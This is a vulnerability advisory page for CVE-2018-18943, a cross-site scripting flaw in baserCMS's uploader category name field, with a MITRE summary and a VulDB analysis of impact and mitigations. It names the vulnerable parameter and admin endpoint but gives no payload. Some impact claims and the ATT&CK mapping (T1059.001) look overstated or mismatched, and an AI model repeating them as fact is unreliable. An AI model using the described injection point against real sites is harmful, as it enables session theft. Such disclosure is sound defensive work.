CVE-2018-18943 in BaserCMS
Summary
by MITRE
An issue was discovered in baserCMS before 4.1.4. In the Register New Category feature of the Upload menu, the category name can be used for XSS via the data[UploaderCategory][name] parameter to an admin/uploader/uploader_categories/edit URI.
If you want to get best quality of vulnerability data, you may have to visit VulDB.
Analysis
by VulDB Data Team • 04/10/2020
This vulnerability exists in baserCMS versions prior to 4.1.4 within the administrative upload functionality, specifically in the register new category feature. The flaw manifests as a cross-site scripting vulnerability that allows attackers to inject malicious scripts through the data[UploaderCategory][name] parameter when interacting with the admin/uploader/uploader_categories/edit URI endpoint. The vulnerability stems from insufficient input validation and output sanitization mechanisms within the category name field, which fails to properly escape or filter user-supplied data before rendering it in the web interface.
The technical implementation of this vulnerability follows CWE-79 Cross-Site Scripting patterns where user-controllable input flows directly into the application's output without proper sanitization. Attackers can exploit this by submitting malicious payloads through the category name field, which then gets executed in the context of other users' browsers who view the affected administrative interface. This creates a persistent XSS vector that can be leveraged for session hijacking, credential theft, or redirection to malicious sites. The vulnerability is particularly dangerous in administrative contexts where privileged users interact with the affected functionality.
The operational impact of this vulnerability extends beyond simple script execution, as it provides attackers with potential access to administrative functions and sensitive data within the baserCMS environment. Successful exploitation could allow threat actors to escalate privileges, modify content, or establish persistent backdoors within the web application. The vulnerability affects the integrity and confidentiality of the system as it enables unauthorized code execution in the context of administrative sessions. This aligns with ATT&CK technique T1059.001 for Command and Scripting Interpreter and T1566.001 for Phishing, as attackers could use this vulnerability to establish initial access or maintain persistence within the application.
Mitigation strategies should include immediate patching to baserCMS version 4.1.4 or later, which addresses the input validation issues in the uploader category handling. Organizations should also implement proper output encoding for all user-supplied data within administrative interfaces, following secure coding practices outlined in OWASP Top Ten. Additional defensive measures include implementing Content Security Policy headers, conducting regular security code reviews, and establishing proper input validation controls. The vulnerability demonstrates the importance of sanitizing all user inputs in administrative interfaces and implementing proper context-aware output encoding to prevent XSS attacks. Organizations should also consider network segmentation and monitoring for unusual administrative activity that could indicate exploitation attempts.